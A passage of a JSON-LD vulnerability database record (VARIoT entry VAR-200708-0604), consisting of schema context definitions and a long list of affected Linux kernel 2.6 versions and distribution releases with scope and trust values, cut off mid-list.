    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200708-0604",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "version"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.3"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel -test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rpath",
        "version": "1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel 2.6.18-8.1.8.el5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.1x86"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel 2.6.21-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "novell linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9"
      },
      {
        "model": "linux enterprise sdk 10.sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "unitedlinux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "1.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "linux mandrake x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.1"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "kernel -test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel -test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.1"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel -test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.2"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.1"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux enterprise desktop sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.2x8664"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "linux professional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "linux professional oss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.0"
      },
      {
        "model": "linux enterprise server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "suse linux retail solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "8.0"
      },
      {
        "model": "linux personal oss",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.0x86"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux professional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "linux enterprise server 10.sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "kernel -test9-cvs",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.214"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "linux professional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "kernel 2.6.22-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "novell linux pos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "open-enterprise-server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "suse linux school server for i386",
        "scope": null,
        "trust": 0.3,
        "vendor": "s u s e",
        "version": null
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.0x86-64"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "linux enterprise sdk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "kernel -test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.1x86-64"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      },
      {
        "model": "suse linux openexchange server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1627"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "linux professional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.2x8664"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "linux i386",
        "scope": "eq",
